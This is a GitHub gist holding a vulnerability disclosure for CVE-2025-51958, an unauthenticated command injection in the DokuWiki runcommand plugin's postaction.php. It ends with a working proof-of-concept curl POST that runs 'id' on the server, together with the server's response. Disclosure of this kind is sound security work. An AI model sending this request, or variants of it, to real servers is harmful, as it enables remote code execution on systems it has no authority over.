Skip to content

Instantly share code, notes, and snippets.

@NtustLin

NtustLin/CVE-2025-51958

Last active February 23, 2026 06:22
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save NtustLin/f64528002e4f61874045799127dc49a4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save NtustLin/f64528002e4f61874045799127dc49a4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2025-51958
> CVE-2025-51958
> [Suggested description]
> runcommand plugin (Last updated on 2014-04-01) for DokuWiki allow anyone without authentication to execute arbitrary system commands,
> related to lib/plugins/runcommand/postaction.php.
>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Command Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Alessandro Celli
>
> ------------------------------------------
>
> [Affected Product Code Base]
> dokuwiki/lib/plugins/runcommand/postaction.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [CVSS]
> AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
> Overall CVSS Score:9.8
>
> ------------------------------------------
>
> [Reference]
> https://www.dokuwiki.org/plugin:runcommand
> https://download.dokuwiki.org/
>
> ------------------------------------------
>
> [Discoverer]
> LIN YU CHEN (CHT Security Co Ltd)
>
> ------------------------------------------
>
> [POC]
> Request:
> curl http://{IP}/lib/plugins/runcommand/postaction.php -X POST -d "rcObjectId=1&outputType1=text&command1=id"
> Response:
> <pre>
> uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),116(netdev)
> </pre>
>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment